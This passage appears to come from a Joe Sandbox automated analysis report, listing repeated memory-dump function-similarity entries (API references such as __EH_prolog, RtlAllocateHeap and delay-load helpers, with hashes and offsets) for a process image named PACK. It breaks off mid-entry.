                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: 2f78951032062a2280786c88bfab09bb5fae50c32e34365567432db7e1eec2d2
                                                                                                                                              • Instruction ID: 39d2da0225aca8a91b7e0cadb6137730d580a639bdf7e2b66bc251e562d26c9e
                                                                                                                                              • Opcode Fuzzy Hash: 2f78951032062a2280786c88bfab09bb5fae50c32e34365567432db7e1eec2d2
                                                                                                                                              • Instruction Fuzzy Hash: 1041B4719A06D49ADB24DB62C855BEAB3B89F10700F8404FAE58D93093DF745EE8DF50
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: ea3e29797dfe9f221cdc3474bbcc21b52a1fdb4702633edac90c4d39b2df2675
                                                                                                                                              • Instruction ID: ecc0c516026f5a37aaa2331cf3c497453eea2491d5e8164ee17ad85f43764f61
                                                                                                                                              • Opcode Fuzzy Hash: ea3e29797dfe9f221cdc3474bbcc21b52a1fdb4702633edac90c4d39b2df2675
                                                                                                                                              • Instruction Fuzzy Hash: FC2109B1E5021AAFDB14DF74CC45B7AF7A8FB05794F00413AEA05EB281D7709920CAA8
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002F9EF4
                                                                                                                                                • Part of subcall function 002E137D: __EH_prolog.LIBCMT ref: 002E1382
                                                                                                                                                • Part of subcall function 002E137D: new.LIBCMT ref: 002E13FA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: d16fceb090f0d709792a705a047908ef61ac94548a817c49ea679b9519bb87dc
                                                                                                                                              • Instruction ID: e3dc805c80a40274a1d5568587d4beb6dba7a2b2881061c2dee90fcdcb1a7e60
                                                                                                                                              • Opcode Fuzzy Hash: d16fceb090f0d709792a705a047908ef61ac94548a817c49ea679b9519bb87dc
                                                                                                                                              • Instruction Fuzzy Hash: 52215771D1428E9ACF15DFA5C9819FEF7F4AF19300F4000AAE909A7202D6356E65CFA0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: a316239fae54b597b53229672d7ec3b0be0d429c2997e8a9834b216affe90f62
                                                                                                                                              • Instruction ID: 112e60daa17012bdc5cab6e8d97201532bd7d07887e9b212115b6594619796ac
                                                                                                                                              • Opcode Fuzzy Hash: a316239fae54b597b53229672d7ec3b0be0d429c2997e8a9834b216affe90f62
                                                                                                                                              • Instruction Fuzzy Hash: 7A11E977D6056997CF12AF99CC419EEB736AF48350F414126F8146B252CA308D658FD0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E5A22
                                                                                                                                                • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                              • Opcode ID: fb24da2b55b31425c2f5e5880c1389ce6577d7e9621af28d16c63bc9fefb0efb
                                                                                                                                              • Instruction ID: 2dafcb79a6b1a9b30c6924281c5f099f9d780e3d5e06a0db389a8d90913e4e27
                                                                                                                                              • Opcode Fuzzy Hash: fb24da2b55b31425c2f5e5880c1389ce6577d7e9621af28d16c63bc9fefb0efb
                                                                                                                                              • Instruction Fuzzy Hash: 2C01D130979684CAD715E7A4C2053EEB7A49F25300F4005ADE48D53382DBB82B14CB63
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: c74156c55300be90aa415656f952cccf3d9eec9ecb6e78d15020a5cf84e45fc8
                                                                                                                                              • Instruction ID: e5e11066d29823e78fdca475a97fb46f1dba9829752acbf501bbb346241750bd
                                                                                                                                              • Opcode Fuzzy Hash: c74156c55300be90aa415656f952cccf3d9eec9ecb6e78d15020a5cf84e45fc8
                                                                                                                                              • Instruction Fuzzy Hash: DFE0ED31F0B2226AEA2326298D25B5E3A4CEB017B0F1A0120EC149A2D1CF20FE1082E1
                                                                                                                                              APIs
                                                                                                                                              • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 002EA1E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFind
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                              • Opcode ID: 771ef13b9d37a8eab0f63c439dea64dd25a1d5b620294e233028d2afcaf2b2a6
                                                                                                                                              • Instruction ID: 7a1fc1145adcdb1c710a6dac56ab57936cbff14c9f971cd11fe88027f48ce75b
                                                                                                                                              • Opcode Fuzzy Hash: 771ef13b9d37a8eab0f63c439dea64dd25a1d5b620294e233028d2afcaf2b2a6
                                                                                                                                              • Instruction Fuzzy Hash: 43F089350687C0AACA235B7548047C77B956F1A331F448A4EF5FD12192C67564E5DB22
                                                                                                                                              APIs
                                                                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 002F031D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecutionStateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2211380416-0
                                                                                                                                              • Opcode ID: fd62d4df5065e17aa801e40f9d3ef46d1a7051100074b26fda4a8d6ac3aed330
                                                                                                                                              • Instruction ID: daeddd14a66c343e0adb20cc9152917f4bc3f9fe0deb590acbd7148ba1181142
                                                                                                                                              • Opcode Fuzzy Hash: fd62d4df5065e17aa801e40f9d3ef46d1a7051100074b26fda4a8d6ac3aed330
                                                                                                                                              • Instruction Fuzzy Hash: B9D0C221A2019552EA2637252889BFE560A4F857E0F08407AB249262D3CA4508AAC7E2
                                                                                                                                              APIs
                                                                                                                                              • GetFileType.KERNEL32(000000FF,002E9683), ref: 002E9751
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileType
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                              • Opcode ID: b7fa0dd700dfe956f60c5639f94597ae148686e1528ae4d4cfaf522d87137439
                                                                                                                                              • Instruction ID: f71ef42e6797f81244a3d5fb23ab979dd9b8826844da96f5d32f9add57e6f9e9
                                                                                                                                              • Opcode Fuzzy Hash: b7fa0dd700dfe956f60c5639f94597ae148686e1528ae4d4cfaf522d87137439
                                                                                                                                              • Instruction Fuzzy Hash: 2DD012B0471281958F211E394E09096A655AF433A6B78C6A5D025C40B2C722C8E7F500
                                                                                                                                              APIs
                                                                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 002FCA23
                                                                                                                                                • Part of subcall function 002FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
                                                                                                                                                • Part of subcall function 002FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
                                                                                                                                                • Part of subcall function 002FA388: IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
                                                                                                                                                • Part of subcall function 002FA388: TranslateMessage.USER32(?), ref: 002FA3CC
                                                                                                                                                • Part of subcall function 002FA388: DispatchMessageW.USER32(?), ref: 002FA3D6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 897784432-0
                                                                                                                                              • Opcode ID: 9869fadda9c966f965e7a798f8b88a313c4e274a53d5907bd4d2c530c72a4cc2
                                                                                                                                              • Instruction ID: f1d5268f44078dfcefdb3c01fc6fc3ae25fdfab9af12a87cd3684836bcb8ab7b
                                                                                                                                              • Opcode Fuzzy Hash: 9869fadda9c966f965e7a798f8b88a313c4e274a53d5907bd4d2c530c72a4cc2
                                                                                                                                              • Instruction Fuzzy Hash: 6DD09E76154300BAD7122B51CE07F1ABBB6BB8DB44F404558B345740B1C662AD319F12
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: d9fd92a4187554c44e24c81a6f0223d9994acfb799689b19058d12d2a9626d50
                                                                                                                                              • Instruction ID: 79d746c4db9c6b972dbf5fa72fce253a3da7e247e53ad3a3a738445ddcda0b45
                                                                                                                                              • Opcode Fuzzy Hash: d9fd92a4187554c44e24c81a6f0223d9994acfb799689b19058d12d2a9626d50
                                                                                                                                              • Instruction Fuzzy Hash: 39D0C970410212CFE7618F29E404782BBE4AF0C311B11886E90C9C2124E2704890CF50
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 0c84e28adc865a1c28b444eb9bb1305147fda888d8ecc293447933f4f4fb1fb3
                                                                                                                                              • Instruction ID: c7126236a412e7777bda897174f1775afe0392e889812007f8b5b886f59fce3f
                                                                                                                                              • Opcode Fuzzy Hash: 0c84e28adc865a1c28b444eb9bb1305147fda888d8ecc293447933f4f4fb1fb3
                                                                                                                                              • Instruction Fuzzy Hash: 67B012857BD108BD320E3140FD02CB7420FC1C5B55370C13AF109C008094814DD10032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 49d63c4c9aea3df3ad9a778b4cc2ab417f7bd8926760c528e2a7be392dd7636b
                                                                                                                                              • Instruction ID: 656eb84763bbcc7c9d2ae9e7bcc2176476e39815b0fbc0cb01b4ea0db00b7521
                                                                                                                                              • Opcode Fuzzy Hash: 49d63c4c9aea3df3ad9a778b4cc2ab417f7bd8926760c528e2a7be392dd7636b
                                                                                                                                              • Instruction Fuzzy Hash: 69B0128577D004AD320E71446C02CB7430FD0C9B55370C43AF10DC0088D4814D910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: ae8f2f875295dc425e4f953fc6d3c1232844835b496f444c04625f5383a16234
                                                                                                                                              • Instruction ID: 3dcbb330a539a77dac48d41471cd5ae86e31df842bebae38164c3d8de38088a3
                                                                                                                                              • Opcode Fuzzy Hash: ae8f2f875295dc425e4f953fc6d3c1232844835b496f444c04625f5383a16234
                                                                                                                                              • Instruction Fuzzy Hash: F8B0128577D104AD320E71447C02DB7431FC0C9B55370C03AF50DC1040D4814D910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 47adae98c8563cd17bd8e22e4646f23c7c5524f4ab43bda1778183b2fe8d7e19
                                                                                                                                              • Instruction ID: 2e336962fff4729db7c29ca5892178bb10e8aee72a7e2498f53742679a8f897b
                                                                                                                                              • Opcode Fuzzy Hash: 47adae98c8563cd17bd8e22e4646f23c7c5524f4ab43bda1778183b2fe8d7e19
                                                                                                                                              • Instruction Fuzzy Hash: 37B0128577D004AD320E71447D02CB7430FC0C9B55370C03AF10DC1040D4824D920032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: c12c5506301cc32e42af53ef9138a5c8d15d3de0091ada21cb1a5216f5cd1353
                                                                                                                                              • Instruction ID: 3d6028c5d170b76c0046bbd5ea1ffd384984d223e2ceb8b4d7169f70a36f0ec3
                                                                                                                                              • Opcode Fuzzy Hash: c12c5506301cc32e42af53ef9138a5c8d15d3de0091ada21cb1a5216f5cd1353
